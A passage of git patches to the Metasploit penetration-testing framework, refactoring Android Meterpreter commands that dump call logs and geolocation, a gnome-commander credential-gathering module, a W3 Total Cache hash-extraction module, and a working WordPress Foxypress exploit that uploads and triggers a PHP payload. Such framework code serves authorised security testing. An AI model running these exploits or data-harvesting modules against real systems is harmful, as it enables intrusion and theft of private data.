         print_line('Get current location using geolocation.')
         print_line(geolocate_opts.usage)
         return
@@ -274,7 +270,7 @@ class Console::CommandDispatcher::Android
 
     geo = client.android.geolocate
 
-    print_status('Current Location:\n')
+    print_status('Current Location:')
     print_line("\tLatitude  : #{geo[0]['lat']}")
     print_line("\tLongitude : #{geo[0]['long']}\n")
     print_line("To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=#{geo[0]['lat']},#{geo[0]['long']}&sensor=true\n")
@@ -302,7 +298,7 @@ class Console::CommandDispatcher::Android
     dump_calllog_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: dump_calllog [options]\n')
+        print_line('Usage: dump_calllog [options]')
         print_line('Get call log.')
         print_line(dump_calllog_opts.usage)
         return
@@ -318,32 +314,30 @@ class Console::CommandDispatcher::Android
       begin
         info = client.sys.config.sysinfo
 
-        ::File.open(path, 'wb') do |fd|
+        data = String::new
+        data << "\n=================\n"
+        data << "[+] Call log dump\n"
+        data << "=================\n\n"
 
-          fd.write("\n=================\n")
-          fd.write("[+] Call log dump\n")
-          fd.write("=================\n\n")
+        time = Time.new
+        data << "Date: #{time.inspect}\n"
+        data << "OS: #{info['OS']}\n"
+        data << "Remote IP: #{client.sock.peerhost}\n"
+        data << "Remote Port: #{client.sock.peerport}\n\n"
 
-          time = Time.new
-          fd.write("Date: #{time.inspect}\n")
-          fd.write("OS: #{info['OS']}\n")
-          fd.write("Remote IP: #{client.sock.peerhost}\n")
-          fd.write("Remote Port: #{client.sock.peerport}\n\n")
+        log.each_with_index { |a, index|
 
-          log.each_with_index { |a, index|
+          data << "##{(index.to_i + 1).to_s()}\n"
 
-            fd.write("##{(index.to_i + 1).to_s()}\n")
+          data << "Number\t: #{a['number']}\n"
+          data << "Name\t: #{a['name']}\n"
+          data << "Date\t: #{a['date']}\n"
+          data << "Type\t: #{a['type']}\n"
+          data << "Duration: #{a['duration']}\n\n"
+        }
 
-            fd.write("Number\t: #{a['number']}\n")
-            fd.write("Name\t: #{a['name']}\n")
-            fd.write("Date\t: #{a['date']}\n")
-            fd.write("Type\t: #{a['type']}\n")
-            fd.write("Duration: #{a['duration']}\n\n")
-          }
-        end
-
-        path = ::File.expand_path(path)
-        print_status("Call log saved to: #{path}")
+        path = store_loot("android.calllog", "text/plain", client.sock.peerhost, data, "call-log.txt", "Android Call Log Dump")
+        print_status("Call log saved to #{path}")
         Rex::Compat.open_file(path)
 
         return true
@@ -367,7 +361,7 @@ class Console::CommandDispatcher::Android
     check_root_opts.parse(args) { | opt, idx, val |
       case opt
       when '-h'
-        print_line('Usage: check_root [options]\n')
+        print_line('Usage: check_root [options]')
         print_line('Check if device is rooted.')
         print_line(check_root_opts.usage)
         return
diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index b10ee80101..3a8fa06aa2 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -5,17 +5,13 @@
 
 require 'msf/core'
 require 'msf/core/payload/dalvik'
-require 'msf/core/handler/reverse_tcp'
-require 'msf/base/sessions/meterpreter_java'
+require 'msf/base/sessions/meterpreter_android'
 require 'msf/base/sessions/meterpreter_options'
 
 
 module Metasploit3
   include Msf::Sessions::MeterpreterOptions
 
-  # The stager should have already included this
-  #include Msf::Payload::Java
-
   def initialize(info = {})
     super(update_info(info,
       'Name'			=> 'Android Meterpreter',
@@ -28,7 +24,7 @@ module Metasploit3
       'Platform'		=> 'android',
       'Arch'			=> ARCH_DALVIK,
       'License'		=> MSF_LICENSE,
-      'Session'		=> Msf::Sessions::Meterpreter_Java_Java))
+      'Session'		=> Msf::Sessions::Meterpreter_Java_Android))
 
     register_options(
     [
@@ -56,7 +52,6 @@ module Metasploit3
   def on_session(session)
     super
     framework.sessions.schedule Proc.new {
-      session.init_ui(self.user_input, self.user_output)
       if (datastore['AutoLoadAndroid'])
         session.load_android
       end

From b061d24b84f915e55126ecb3615a9eec2fd0969d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 28 Jul 2014 09:05:53 -0500
Subject: [PATCH 176/321] Favor & over and

---
 lib/msf/http/wordpress/helpers.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/http/wordpress/helpers.rb b/lib/msf/http/wordpress/helpers.rb
index d6f679716d..837688dab0 100644
--- a/lib/msf/http/wordpress/helpers.rb
+++ b/lib/msf/http/wordpress/helpers.rb
@@ -49,7 +49,7 @@ module Msf::HTTP::Wordpress::Helpers
     options.merge!({'vars_post' => vars_post})
     options.merge!({'cookie' => login_cookie}) if login_cookie
     res = send_request_cgi(options)
-    if res and res.redirect? and res.redirection
+    if res && res.redirect? && res.redirection
       return wordpress_helper_parse_location_header(res)
     else
       message = "#{peer} - Post comment failed."

From 2d5fd5e0d531e17b8d598b2f729a78d816bd3a6f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 28 Jul 2014 09:22:50 -0500
Subject: [PATCH 177/321] Use constant for WORDPRESS_VERSION_PATTERN

---
 lib/msf/http/wordpress/version.rb | 25 +++++++++++--------------
 1 file changed, 11 insertions(+), 14 deletions(-)

diff --git a/lib/msf/http/wordpress/version.rb b/lib/msf/http/wordpress/version.rb
index d2fd251f0e..b313c9557f 100644
--- a/lib/msf/http/wordpress/version.rb
+++ b/lib/msf/http/wordpress/version.rb
@@ -1,36 +1,40 @@
 # -*- coding: binary -*-
 
 module Msf::HTTP::Wordpress::Version
+
+  # Used to check if the version is correct: must contain at least one dot
+  WORDPRESS_VERSION_PATTERN = '([^\r\n"\']+\.[^\r\n"\']+)'
+
   # Extracts the Wordpress version information from various sources
   #
   # @return [String,nil] Wordpress version if found, nil otherwise
   def wordpress_version
     # detect version from generator
-    version = wordpress_version_helper(normalize_uri(target_uri.path), /<meta name="generator" content="WordPress #{wordpress_version_pattern}" \/>/i)
+    version = wordpress_version_helper(normalize_uri(target_uri.path), /<meta name="generator" content="WordPress #{WORDPRESS_VERSION_PATTERN}" \/>/i)
     return version if version
 
     # detect version from readme
-    version = wordpress_version_helper(wordpress_url_readme, /<br \/>\sversion #{wordpress_version_pattern}/i)
+    version = wordpress_version_helper(wordpress_url_readme, /<br \/>\sversion #{WORDPRESS_VERSION_PATTERN}/i)
     return version if version
 
     # detect version from rss
-    version = wordpress_version_helper(wordpress_url_rss, /<generator>http:\/\/wordpress.org\/\?v=#{wordpress_version_pattern}<\/generator>/i)
+    version = wordpress_version_helper(wordpress_url_rss, /<generator>http:\/\/wordpress.org\/\?v=#{WORDPRESS_VERSION_PATTERN}<\/generator>/i)
     return version if version
 
     # detect version from rdf
-    version = wordpress_version_helper(wordpress_url_rdf, /<admin:generatorAgent rdf:resource="http:\/\/wordpress.org\/\?v=#{wordpress_version_pattern}" \/>/i)
+    version = wordpress_version_helper(wordpress_url_rdf, /<admin:generatorAgent rdf:resource="http:\/\/wordpress.org\/\?v=#{WORDPRESS_VERSION_PATTERN}" \/>/i)
     return version if version
 
     # detect version from atom
-    version = wordpress_version_helper(wordpress_url_atom, /<generator uri="http:\/\/wordpress.org\/" version="#{wordpress_version_pattern}">WordPress<\/generator>/i)
+    version = wordpress_version_helper(wordpress_url_atom, /<generator uri="http:\/\/wordpress.org\/" version="#{WORDPRESS_VERSION_PATTERN}">WordPress<\/generator>/i)
     return version if version
 
     # detect version from sitemap
-    version = wordpress_version_helper(wordpress_url_sitemap, /generator="wordpress\/#{wordpress_version_pattern}"/i)
+    version = wordpress_version_helper(wordpress_url_sitemap, /generator="wordpress\/#{WORDPRESS_VERSION_PATTERN}"/i)
     return version if version
 
     # detect version from opml
-    version = wordpress_version_helper(wordpress_url_opml, /generator="wordpress\/#{wordpress_version_pattern}"/i)
+    version = wordpress_version_helper(wordpress_url_opml, /generator="wordpress\/#{WORDPRESS_VERSION_PATTERN}"/i)
     return version if version
 
     nil
@@ -60,13 +64,6 @@ module Msf::HTTP::Wordpress::Version
 
   private
 
-  # Used to check if the version is correct: must contain at least one dot
-  #
-  # @return [ String ]
-  def wordpress_version_pattern
-    '([^\r\n"\']+\.[^\r\n"\']+)'
-  end
-
   def wordpress_version_helper(url, regex)
     res = send_request_cgi(
       'method' => 'GET',

From 7129108c58541a875ad0e125a930b489b3fdc4e5 Mon Sep 17 00:00:00 2001
From: Christopher Truncer <chris@christophertruncer.com>
Date: Mon, 28 Jul 2014 13:49:24 -0400
Subject: [PATCH 178/321] Fixed status in MSF db for Nessus

---
 modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb
index 4e3d30f283..8ae889b107 100644
--- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb
+++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
         :port => datastore['RPORT'],
         :name => "nessus-xmlrpc",
         :info => 'Nessus XMLRPC',
-        :state => 'UP'
+        :state => 'open'
       )
     else
       vprint_error("Wrong HTTP Server header: #{res.headers['Server'] || ''}")

From d33479711674e8d4b495e90fa45581ec090d0b71 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Mon, 28 Jul 2014 22:23:22 +0200
Subject: [PATCH 179/321] Updated foxpress module

---
 lib/msf/http/wordpress/uris.rb                | 21 +++++
 .../unix/webapp/php_wordpress_foxypress.rb    | 81 +++++++------------
 2 files changed, 51 insertions(+), 51 deletions(-)

diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
index 659b419572..1060354113 100644
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -80,4 +80,25 @@ module Msf::HTTP::Wordpress::URIs
     normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
   end
 
+  # Returns the Wordpress wp-content dir URL
+  #
+  # @return [String] Wordpress wp-content dir URL
+  def wordpress_url_wp_content
+    normalize_uri(target_uri.path, wp_content_dir)
+  end
+
+  # Returns the Wordpress plugins dir URL
+  #
+  # @return [String] Wordpress plugins dir URL
+  def wordpress_url_plugins
+    normalize_uri(wordpress_url_wp_content, 'plugins')
+  end
+
+  # Returns the Wordpress themes dir URL
+  #
+  # @return [String] Wordpress themes dir URL
+  def wordpress_url_themes
+    normalize_uri(wordpress_url_wp_content, 'themes')
+  end
+
 end
diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
index e769b8c993..ac738016b1 100644
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -8,17 +8,19 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
-      'Description'    => %q{
+      'Description'    => %q(
           This module exploits an arbitrary PHP code execution flaw in the WordPress
         blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
         file upload and remote code execution via the uploadify.php script. The Foxypress
         plug-in versions 0.4.2.1 and below are vulnerable.
-      },
+      ),
       'Author'         =>
         [
           'Sammy FORGIT', # Vulnerability Discovery, PoC
@@ -27,79 +29,56 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['EDB', '18991'],
-          ['OSVDB', '82652'],
-          ['BID', '53805'],
+          %w(EDB 18991),
+          %w(OSVDB 82652),
+          %w(BID 53805)
         ],
       'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'ConnectionType' => 'find',
-            },
-        },
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [[ 'Automatic', { }]],
+      'Targets'        => [['Foxypress <= 0.4.2.1', {}]],
       'DisclosureDate' => 'Jun 05 2012',
       'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]),
-      ], self.class)
   end
 
   def check
-    uri = target_uri.path
-
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php")
-    })
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
+    )
 
-    if res and res.code == 200
-      return Exploit::CheckCode::Detected
-    else
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Detected if res && res.code == 200
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-
-    uri = normalize_uri(target_uri.path)
-    uri << '/' if uri[-1,1] != '/'
-
-    peer = "#{rhost}:#{rport}"
-
     post_data = Rex::MIME::Message.new
-    post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
+    post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
 
     print_status("#{peer} - Sending PHP payload")
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"),
-      'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
       'data'   => post_data.to_s
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
+    if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
       print_error("#{peer} - File wasn't uploaded, aborting!")
       return
     end
 
-    print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
-    res = send_request_cgi({
+    filename = "#{Regexp.last_match[1]}.php"
+
+    print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
+    register_files_for_cleanup(filename)
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php")
-    })
-
-    if res and res.code != 200
-      print_error("#{peer} - Server returned #{res.code.to_s}")
-    end
+      'uri'    => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
+    )
 
+    print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
   end
-
 end

From 621e85a32d3a51910e01e20c464eb1ad4eeb0e98 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Mon, 28 Jul 2014 22:45:04 +0200
Subject: [PATCH 180/321] Correct version

---
 modules/exploits/unix/webapp/php_wordpress_foxypress.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
index ac738016b1..fa619f4537 100644
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
           This module exploits an arbitrary PHP code execution flaw in the WordPress
         blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
         file upload and remote code execution via the uploadify.php script. The Foxypress
-        plug-in versions 0.4.2.1 and below are vulnerable.
+        plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.
       ),
       'Author'         =>
         [
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [['Foxypress <= 0.4.2.1', {}]],
+      'Targets'        => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],
       'DisclosureDate' => 'Jun 05 2012',
       'DefaultTarget' => 0))
   end

From b121bf6d6c885960a7a0533153207ce5283f5e23 Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Mon, 28 Jul 2014 22:46:50 +0200
Subject: [PATCH 181/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 07ddc0fcad..4d8cf81e45 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -22,23 +22,30 @@ class Metasploit3 < Msf::Post
 
   def run
     user_dirs = []
+    # Search current user
     user = cmd_exec("whoami").chomp
-    if (user == 'root')
+    # User is root
+    if user == 'root'
        print_status("Current user is #{user}, probing all home dirs")
        user_dirs << '/root'
+       # Search home dirs
        cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
     else
+       # Non root user
        print_status("Current user is #{user}, probing /home/#{user}")
        user_dirs << '/home/#{user}'
     end
     # Try to find connections file in users homes
     user_dirs.each do |dir|
+      # gnome-commander connections file
       connections_file = "#{dir}/.gnome-commander/connections"
       if file?(connections_file)
+        #File exists
         begin
           str_file=read_file(connections_file)
           print_good("File found : #{connections_file}")
           vprint_line(str_file)
+          #Store file
           p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
         rescue EOFError

From a904ed8507394fece7d1b57563e1c29ec26ca2d0 Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Mon, 28 Jul 2014 22:49:13 +0200
Subject: [PATCH 182/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 4d8cf81e45..0aee92d732 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post
         end
       else
         # File not found
-        print_error("File not found : #{connections_file}")
+        vprint_error("File not found : #{connections_file}")
       end
     end
   end

From f4bd44d9c6e3cd9df36e1cd166bd71681d6e96de Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Mon, 28 Jul 2014 17:28:15 -0500
Subject: [PATCH 183/321] Fix outstanding issues

---
 .../linux/gather/gnome_commander_creds.rb     | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 0aee92d732..c0191e9716 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -26,14 +26,14 @@ class Metasploit3 < Msf::Post
     user = cmd_exec("whoami").chomp
     # User is root
     if user == 'root'
-       print_status("Current user is #{user}, probing all home dirs")
-       user_dirs << '/root'
-       # Search home dirs
-       cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
+      print_status("Current user is #{user}, probing all home dirs")
+      user_dirs << '/root'
+      # Search home dirs
+      cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
     else
-       # Non root user
-       print_status("Current user is #{user}, probing /home/#{user}")
-       user_dirs << '/home/#{user}'
+      # Non root user
+      print_status("Current user is #{user}, probing /home/#{user}")
+      user_dirs << "/home/#{user}"
     end
     # Try to find connections file in users homes
     user_dirs.each do |dir|
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
         #File exists
         begin
           str_file=read_file(connections_file)
-          print_good("File found : #{connections_file}")
+          print_good("File found: #{connections_file}")
           vprint_line(str_file)
           #Store file
           p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
@@ -54,9 +54,9 @@ class Metasploit3 < Msf::Post
         end
       else
         # File not found
-        vprint_error("File not found : #{connections_file}")
+        vprint_error("File not found: #{connections_file}")
       end
     end
   end
-  
+
 end

From 6bbb2124a7c9357818a4938c6001e57f53da5f55 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 29 Jul 2014 15:49:14 +0200
Subject: [PATCH 184/321] bug fixing

---
 modules/payloads/stages/android/meterpreter.rb | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index 3a8fa06aa2..42afc4cb24 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -14,17 +14,17 @@ module Metasploit3
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'			=> 'Android Meterpreter',
-      'Description'	=> 'Run a meterpreter server on Android',
-      'Author'		=> [
+      'Name'      => 'Android Meterpreter',
+      'Description' => 'Run a meterpreter server on Android',
+      'Author'    => [
           'mihi', # all the hard work
           'egypt', # msf integration
           'anwarelmakrahy' # android extension
         ],
-      'Platform'		=> 'android',
-      'Arch'			=> ARCH_DALVIK,
-      'License'		=> MSF_LICENSE,
-      'Session'		=> Msf::Sessions::Meterpreter_Java_Android))
+      'Platform'    => 'android',
+      'Arch'      => ARCH_DALVIK,
+      'License'   => MSF_LICENSE,
+      'Session'   => Msf::Sessions::Meterpreter_Java_Android))
 
     register_options(
     [

From 7512e0489456872a01fc7f0e160b38262b1d3566 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 29 Jul 2014 16:21:31 +0200
Subject: [PATCH 185/321] fixing autoload

---
 lib/msf/base/sessions/meterpreter_android.rb              | 1 +
 lib/rex/post/meterpreter/extensions/android/android.rb    | 2 --
 .../meterpreter/ui/console/command_dispatcher/android.rb  | 8 ++++----
 3 files changed, 5 insertions(+), 6 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter_android.rb b/lib/msf/base/sessions/meterpreter_android.rb
index 6252737ed1..6727bfd81b 100644
--- a/lib/msf/base/sessions/meterpreter_android.rb
+++ b/lib/msf/base/sessions/meterpreter_android.rb
@@ -1,6 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/base/sessions/meterpreter'
+require 'msf/base/sessions/meterpreter_java'
 require 'msf/base/sessions/meterpreter_options'
 
 module Msf
diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 6399e31757..e36a27eb31 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -1,6 +1,5 @@
 #!/usr/bin/env ruby
 # -*- coding: binary -*-
-
 require 'rex/post/meterpreter/extensions/android/tlv'
 require 'rex/post/meterpreter/packet'
 require 'rex/post/meterpreter/client'
@@ -120,7 +119,6 @@ class Android < Extension
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
-  
 end
 
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 7e4289167f..971ef3a230 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
-require 'msf/core'
 require 'rex/post/meterpreter'
+require 'msf/core/auxiliary/report'
 
 module Rex
 module Post
@@ -15,9 +15,9 @@ module Ui
 class Console::CommandDispatcher::Android
   include Console::CommandDispatcher
   include Msf::Auxiliary::Report
-
-  def initialize(shell)
-    super
+ 
+  def framework
+    client.framework
   end
 
   #

From b02dbcc2e733f22aeb24132dfbd61aa00a703ba2 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 29 Jul 2014 16:23:27 +0200
Subject: [PATCH 186/321] remove extra whitespace

---
 lib/msf/base/sessions/meterpreter_java.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb
index bd4bd9436c..84b0741b56 100644
--- a/lib/msf/base/sessions/meterpreter_java.rb
+++ b/lib/msf/base/sessions/meterpreter_java.rb
@@ -11,7 +11,6 @@ module Sessions
 #
 ###
 class Meterpreter_Java_Java < Msf::Sessions::Meterpreter
-
   def supports_ssl?
     false
   end

From c2be3d687515c415a1a25436a4c15daeabd241b9 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Tue, 29 Jul 2014 17:51:56 +0200
Subject: [PATCH 187/321] fixing autoload bug

---
 lib/msf/base/sessions/meterpreter_options.rb   | 6 ++++++
 modules/payloads/stages/android/meterpreter.rb | 9 ---------
 2 files changed, 6 insertions(+), 9 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index 333dd968a7..2a02ad9aa7 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -59,6 +59,12 @@ module MeterpreterOptions
       end
     end
 
+    if session.platform =~ /android/i
+      if (datastore['AutoLoadAndroid'])
+        session.load_android
+      end
+    end
+
     [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
       if (datastore[key].empty? == false)
         args = Shellwords.shellwords( datastore[key] )
diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index 42afc4cb24..f10b09acc8 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -48,13 +48,4 @@ module Metasploit3
     # it from, and then finally the meterpreter stage
     java_string(clazz) + java_string(metstage) + java_string(met)
   end
-
-  def on_session(session)
-    super
-    framework.sessions.schedule Proc.new {
-      if (datastore['AutoLoadAndroid'])
-        session.load_android
-      end
-    }
-  end
 end

From 3d2a62bc29a0c62569eb906b1155c551d98a02ca Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 29 Jul 2014 19:49:48 +0200
Subject: [PATCH 188/321] Updated W3 Total Cache Hash extract module

---
 .../gather/wp_w3_total_cache_hash_extract.rb  | 100 +++++++++---------
 1 file changed, 52 insertions(+), 48 deletions(-)

diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
index 228fda6197..62bf9ba864 100644
--- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
@@ -6,8 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
-
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::Wordpress
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
@@ -15,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
     super(
       'Name'          => 'W3-Total-Cache Wordpress-plugin 0.9.2.4 (or before) Username and Hash Extract',
       'Description'   =>
-          "The W3-Total-Cache Wordpress Plugin <= 0.9.24 can cache database statements
+          "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
         and it's results in files for fast access. Version 0.9.2.4 has been fixed afterwards
         so it can be vulnerable. These cache files are in the webroot of the Wordpress
         installation and can be downloaded if the name is guessed. This modules tries to
@@ -25,76 +24,81 @@ class Metasploit3 < Msf::Auxiliary
       'License'       => MSF_LICENSE,
       'References'    =>
         [
-          [ 'OSVDB', '88744'],
-          [ 'URL', 'http://seclists.org/fulldisclosure/2012/Dec/242']
+          %w(OSVDB 88744),
+          ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/242']
         ],
       'Author'        =>
         [
-          'Christian Mehlmauer',  # Metasploit module
-          'Jason A. Donenfeld <Jason[at]zx2c4.com>'       # POC
+          'Christian Mehlmauer',                    # Metasploit module
+          'Jason A. Donenfeld <Jason[at]zx2c4.com>' # POC
         ]
     )
 
     register_options(
       [
-        OptString.new('TARGETURI', [ true,	'Wordpress root', '/']),
-        OptString.new('TABLE_PREFIX', [ true,	'Wordpress table prefix', 'wp_']),
-        OptInt.new('SITE_ITERATIONS', [ true, 'Number of sites to iterate', 25]),
-        OptInt.new('USER_ITERATIONS', [ true, 'Number of users to iterate', 25]),
-        OptString.new('WP_CONTENT_DIR', [ true,	'Wordpress content directory', 'wp-content'])
+        OptString.new('TABLE_PREFIX', [true,	'Wordpress table prefix', 'wp_']),
+        OptInt.new('SITE_ITERATIONS', [true, 'Number of sites to iterate', 25]),
+        OptInt.new('USER_ITERATIONS', [true, 'Number of users to iterate', 25])
       ], self.class)
   end
 
-  def wordpress_url
-    url = target_uri
-    url.path << "/" if url.path[-1,1] != "/"
-    url
+  def table_prefix
+    datastore['TABLE_PREFIX']
+  end
+
+  def site_iterations
+    datastore['SITE_ITERATIONS']
+  end
+
+  def user_iterations
